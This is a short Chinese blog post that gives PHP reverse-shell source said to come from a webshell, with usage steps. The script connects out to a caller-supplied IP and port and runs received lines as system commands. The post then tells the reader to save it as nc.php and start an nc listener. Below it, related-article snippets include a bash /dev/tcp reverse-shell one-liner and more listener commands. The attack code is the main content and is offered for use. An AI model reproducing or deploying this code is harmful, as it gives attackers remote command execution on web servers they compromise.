一次遇到一php大马,发现里面竟然有反弹shell的功能,研究后整理出反弹shell的php源码。
<?php
set_time_limit(0);
$ip=$_POST['ip'];
$port=$_POST['port'];
$fp=@fsockopen($ip,$port,$errno,$errstr);
if(!$fp){ echo "error";}
else{
fputs($fp,"\n++++++++++connect success++++++++\n");
while (!feof($fp)) {
fputs($fp,"shell:");//输出
$shell=fgets($fp);
$message=`$shell`;
fputs($fp,$message);
}
fclose($fp);
}
?>
保存为nc.php。。
先在kali 192.168.72.140 开启监听本地4444端口。然后访问nc.php开始反弹shell。
nc -lvp 4444
ok
一次遇到一php大马,发现里面竟然有反弹shell的功能,研究后整理出反弹shell的php源码。
标签:本地文件包含(LFI)、FUZZ、PHP伪协议、nginx日志文件写一句话、反弹shell、screen提权...
前言 本文记录反弹shell的一些注意事项,主要包括:常用反弹shell的payload,获得tty-shell,...
例如开机自启cmd 自启nc反弹shell(一) 自启nc反弹shell(二)
反弹Shell https://www.cnblogs.com/cocowool/p/reverse-shell....
Linux linux basic shell basic PHP php composer Framework ...
Reverse Shell bash反弹服务端: bash -c 'sh -i &>/dev/tcp/210.28...
bash -i 操作 攻击机 192.168.188.140执行 nc -lvvp 8888监听本地8888端口 ...
背景 前段时间因为使用Flink默认配置,没有禁用通过web上传jar包提交作业的功能,同时服务器配有公网地址,也...
0X01 什么是反弹shell reverse shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到...
本文标题:php反弹shell
本文链接:https://www.haomeiwen.com/subject/rhywaftx.html
网友评论